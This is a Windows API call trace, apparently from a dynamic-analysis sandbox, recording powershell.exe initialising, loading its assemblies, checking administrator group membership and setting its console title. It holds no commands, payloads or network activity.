	[0864.404] CoTaskMemFree (pv=0x251580) 
	[0864.405] CoTaskMemAlloc (cb=0x104) returned 0x251580
	[0864.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.405] CoTaskMemFree (pv=0x251580) 
	[0865.844] CoTaskMemAlloc (cb=0x104) returned 0x251580
	[0865.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.844] CoTaskMemFree (pv=0x251580) 
	[0865.846] CoTaskMemAlloc (cb=0x104) returned 0x251580
	[0865.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.846] CoTaskMemFree (pv=0x251580) 
	[0865.846] CoTaskMemAlloc (cb=0x104) returned 0x251580
	[0865.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x251580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.847] CoTaskMemFree (pv=0x251580) 
	[0872.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0872.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0873.008] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0873.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.008] CoTaskMemFree (pv=0x20ea10) 
	[0873.011] CoTaskMemAlloc (cb=0x104) returned 0x20ea10
	[0873.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20ea10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0873.011] CoTaskMemFree (pv=0x20ea10) 
	[0874.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0874.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0901.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0901.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0901.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0901.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0909.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0909.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0917.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0917.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0926.646] CoTaskMemAlloc (cb=0x104) returned 0x20c570
	[0926.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20c570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.646] CoTaskMemFree (pv=0x20c570) 
	[0926.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0927.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0931.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x18d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0931.050] SetErrorMode (uMode=0x1) returned 0x1
	[0931.050] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x18db00 | out: lpFileInformation=0x18db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0931.050] SetErrorMode (uMode=0x1) returned 0x1
	[0957.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0957.926] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0957.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.926] CoTaskMemFree (pv=0x1b7241c0) 
	[0957.929] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0957.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.929] CoTaskMemFree (pv=0x1b7241c0) 
	[0957.929] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0957.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.929] CoTaskMemFree (pv=0x1b7241c0) 
	[0957.931] CoCreateGuid (in: pguid=0x18dec8 | out: pguid=0x18dec8*(Data1=0xde0476ea, Data2=0x5166, Data3=0x42aa, Data4=([0]=0x9b, [1]=0x3e, [2]=0x12, [3]=0xa0, [4]=0x18, [5]=0x9, [6]=0x1c, [7]=0x5c))) returned 0x0
	[0957.934] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0957.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.934] CoTaskMemFree (pv=0x1b7241c0) 
	[0957.936] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0957.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.936] CoTaskMemFree (pv=0x1b7241c0) 
	[0957.939] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0957.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.939] CoTaskMemFree (pv=0x1b7241c0) 
	[0957.952] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0958.472] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x18db70 | out: lpConsoleScreenBufferInfo=0x18db70) returned 1
	[0958.493] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0958.493] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x18db70 | out: lpConsoleScreenBufferInfo=0x18db70) returned 1
	[0958.497] GetVersionExW (in: lpVersionInformation=0x18db00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18db00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0958.503] GetCurrentProcess () returned 0xffffffffffffffff
	[0958.505] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18db98 | out: TokenHandle=0x18db98*=0x2f4) returned 1
	[0958.509] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18dab8 | out: TokenInformation=0x0, ReturnLength=0x18dab8) returned 0
	[0958.510] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x270840
	[0958.510] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x270840, TokenInformationLength=0x4, ReturnLength=0x18dab8 | out: TokenInformation=0x270840, ReturnLength=0x18dab8) returned 1
	[0958.510] DuplicateTokenEx (in: hExistingToken=0x2f4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18dc18 | out: phNewToken=0x18dc18*=0xe4) returned 1
	[0958.511] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18dab8 | out: TokenInformation=0x0, ReturnLength=0x18dab8) returned 0
	[0958.511] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0x8, TokenInformation=0x270870, TokenInformationLength=0x4, ReturnLength=0x18dab8 | out: TokenInformation=0x270870, ReturnLength=0x18dab8) returned 1
	[0958.511] CheckTokenMembership (in: TokenHandle=0xe4, SidToCheck=0x2c7bc60*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18dc28 | out: IsMember=0x18dc28) returned 1
	[0958.511] CloseHandle (hObject=0xe4) returned 1
	[0958.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0958.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0958.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0958.536] CoTaskMemAlloc (cb=0x804) returned 0x1b726080
	[0958.536] GetConsoleTitleW (in: lpConsoleTitle=0x1b726080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0958.537] CoTaskMemFree (pv=0x1b726080) 
	[0960.634] CoTaskMemAlloc (cb=0x804) returned 0x1b726930
	[0960.634] GetConsoleTitleW (in: lpConsoleTitle=0x1b726930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0960.634] CoTaskMemFree (pv=0x1b726930) 
	[0960.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.636] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0961.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0961.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0962.142] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f8
	[0962.144] CoCreateGuid (in: pguid=0x18dd10 | out: pguid=0x18dd10*(Data1=0x117618ee, Data2=0xc0c7, Data3=0x4b78, Data4=([0]=0xb5, [1]=0xa4, [2]=0xca, [3]=0xe4, [4]=0x6d, [5]=0xaa, [6]=0x19, [7]=0x55))) returned 0x0
